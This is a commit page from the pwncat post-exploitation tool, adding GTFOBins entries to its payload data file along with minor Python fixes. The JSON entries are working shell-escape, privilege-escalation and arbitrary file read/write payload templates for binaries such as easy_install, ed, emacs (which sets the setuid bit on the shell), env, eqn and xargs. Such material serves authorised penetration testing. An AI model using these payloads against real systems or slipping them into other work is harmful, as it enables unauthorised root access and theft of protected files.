1
0
mirror of https://github.com/calebstewart/pwncat.git synced 2024-11-27 19:04:15 +01:00

Added more GTFOBins

This commit is contained in:
John Hammond 2020-05-17 17:01:08 -04:00
parent d62366da45
commit 14c67f9b4b
6 changed files with 151 additions and 9 deletions

View File

@ -543,6 +543,136 @@
"input": "!{shell} -p\n",
"exit": "exit\nq\n"
}
]
],
//-------------------------------------------------------------------
"easy_install": [
{
"type": "shell",
"payload": "TF=none; {command} -h; TF=$({mktemp} -d);echo \"import os; os.execl('/bin/sh', 'sh', '-c', '{shell} <$(tty) >$(tty) 2>$(tty)')\" > $TF/setup.py; {command} $TF",
"args": [],
"exit": "exit\n"
},
{
"type": "read",
"stream": "raw",
"payload": "TF=none; {command} -h 2>/dev/null 1>&2; TF=$({mktemp} -d);echo \"import sys; sys.stdout.buffer.write(open('{lfile}', 'rb').read())\" > $TF/setup.py; {command} $TF 2>/dev/null | {tail} -n +4",
"args": []
}
// This seems to write small files... but not large (over ~4 KB). So we won't use it... ???
// ,{
// "type": "write",
// "stream": "base64",
// "payload": "TF=none; {command} -h 2>/dev/null 1>&2; TF=$({mktemp} -d); {cat} > $TF/b64; echo \"import os; os.execl('''{python}''', 'python', '''-c''', '''import base64; open('{lfile}','wb').write(base64.b64decode(open('$TF/b64', 'rb').read()))''')\" > $TF/setup.py; {command} $TF 2>/dev/null",
// "args": [],
// "exit": "{ctrl_d}{ctrl_d}"
// }
],
//-------------------------------------------------------------------
"eb": [
{
"type": "shell",
"payload": "{command}",
"args": ["logs"],
"input": "!{shell} -p\n",
"exit": "exit\nq\n"
}
],
//-------------------------------------------------------------------
"ed": [
{
"type": "shell",
"payload": "{command}",
"input": "!{shell} -p\n",
"exit": "exit\nq\n"
},
{
"type": "read",
"stream": "raw",
"payload": "echo ',p' | {command}",
"args": ["-s", "{lfile}"],
"input" : ",p\n",
"exit" : "q\n"
},
{
"type": "write",
"stream": "print",
"payload": "echo -e \"1,\\$d\\na\\n$({cat})\\n.\\nw\\nq\\n\" | {command}",
"args": ["-s", "{lfile}"],
"exit": "{ctrl_d}"
}
],
//-------------------------------------------------------------------
"emacs": [
{
"type": "shell",
"payload": "{command}; {shell} -p",
"args": ["-Q", "-nw", "--eval '(chmod \"{shell}\" #o4755)'" , "--eval \"(kill-emacs)\""],
"exit": "exit\n"
},
{
"type": "read",
"stream": "raw",
"payload": "TF=$({mktemp}); {command}; {cat} $TF ",
"args": ["-Q", "-nw", "{lfile}", "--eval \"(write-file \\\"$TF\\\")\"", "--eval '(kill-emacs)'"]
},
{
"type": "write",
"stream": "print",
"payload": "{cat} > /tmp/.em; {command}",
"args": ["-Q", "-nw", "/tmp/.em", "--eval \"(write-file \\\"{lfile}\\\")\"", "--eval '(kill-emacs)'"],
"exit": "{ctrl_d}{ctrl_d}"
}
],
//-------------------------------------------------------------------
"env": [
{
"type": "shell",
"payload": "{command} {shell} -p",
"args": [],
"exit": "exit\n"
}
],
//-------------------------------------------------------------------
"eqn": [
{
"type": "read",
"stream": "print",
"payload": "TF={lfile}; {command} | {grep} -Pzo \"(?s)\\.lf 1 $TF.*\" | {tail} -n +2",
"args": ["$TF"]
}
],
//-------------------------------------------------------------------
"xargs": [
{
"type": "shell",
"payload": "{command}",
"args": ["-a", "/dev/null", "{shell}", "-p"],
"exit": "exit\n"
},
{
"type": "read",
"stream": "print",
"payload": "{command}",
"args": ["-a", "{lfile}", "-0"]
}
]
}

View File

@ -142,8 +142,8 @@ class Command(CommandDefinition):
# Lookup the method
try:
method = pwncat.victim.persist.find(args.method)
except KeyError:
method = next(pwncat.victim.persist.find(args.method))
except StopIteration:
self.parser.error(f"{args.method}: no such persistence method")
return

View File

@ -135,8 +135,11 @@ class Command(CommandDefinition):
self.parser.error("missing required argument: --data")
# Read in the data file
with open(args.data, "rb") as f:
data = f.read()
try:
with open(args.data, "rb") as f:
data = f.read()
except PermissionError:
self.parser.error(f"no local permission to read: {args.data}")
try:
# Attempt to write the data to the remote file

View File

@ -10,6 +10,7 @@ import io
class ControlCodes:
CTRL_C = "\x03"
CTRL_X = "\x18"
CTRL_Z = "\x1a"
CTRL_D = "\x04"
ESCAPE = "\x1B"
@ -156,6 +157,7 @@ class Method:
" ".join(args),
ctrl_c=ControlCodes.CTRL_C,
ctrl_z=ControlCodes.CTRL_Z,
ctrl_x=ControlCodes.CTRL_X,
escape=ControlCodes.ESCAPE,
ctrl_d=ControlCodes.CTRL_D,
**kwargs,
@ -173,6 +175,7 @@ class Method:
command,
ctrl_c=ControlCodes.CTRL_C,
ctrl_z=ControlCodes.CTRL_Z,
ctrl_x=ControlCodes.CTRL_X,
escape=ControlCodes.ESCAPE,
ctrl_d=ControlCodes.CTRL_D,
**kwargs,
@ -183,6 +186,7 @@ class Method:
self.payload,
command=command,
ctrl_c=ControlCodes.CTRL_C,
ctrl_x=ControlCodes.CTRL_X,
ctrl_z=ControlCodes.CTRL_Z,
escape=ControlCodes.ESCAPE,
ctrl_d=ControlCodes.CTRL_D,
@ -254,6 +258,7 @@ class MethodWrapper:
self.method.exit,
ctrl_c=ControlCodes.CTRL_C,
ctrl_z=ControlCodes.CTRL_Z,
ctrl_x=ControlCodes.CTRL_X,
escape=ControlCodes.ESCAPE,
ctrl_d=ControlCodes.CTRL_D,
**kwargs,
@ -264,6 +269,7 @@ class MethodWrapper:
self.method.input,
ctrl_c=ControlCodes.CTRL_C,
ctrl_z=ControlCodes.CTRL_Z,
ctrl_x=ControlCodes.CTRL_X,
escape=ControlCodes.ESCAPE,
ctrl_d=ControlCodes.CTRL_D,
**kwargs,

View File

@ -22,7 +22,8 @@ from pwncat import util
# privesc_methods = [SetuidMethod, SuMethod]
# privesc_methods = [SuMethod, SudoMethod, SetuidMethod, DirtycowMethod, ScreenMethod]
privesc_methods = [SuMethod, SudoMethod, SetuidMethod]
# privesc_methods = [SuMethod, SudoMethod, SetuidMethod]
privesc_methods = [SuMethod, SudoMethod]
class Finder:

View File

@ -59,7 +59,9 @@ group.add_argument(
parser.add_argument("--path", "-p", help="The local file name to read or write")
parser.add_argument("--length", "-l", type=int, help="The length the data to write")
parser.add_argument("--shell", "-s", help="The local shell to start")
parser.add_argument(
"--shell", "-s", help="The local shell to start", default="/bin/bash"
)
parser.add_argument("--data", "-d", help="The local data to write to the remote file")
parser.add_argument(
"--capability",
@ -105,7 +107,7 @@ def local_which(path: str, quote: bool = True):
return result
gtfo = GTFOBins("data/gtfobins.json", local_which)
gtfo = GTFOBins("../data/gtfobins.json", local_which)
if args.find:
if not args.spec:
@ -137,6 +139,6 @@ for method in methods:
user=args.user,
spec=args.spec,
)
print(f" Payload: {repr(payload)}")
print(f" Payload: {payload}")
print(f" Input: {repr(input_data)}")
print(f" Exit Command: {repr(exit_cmd)}")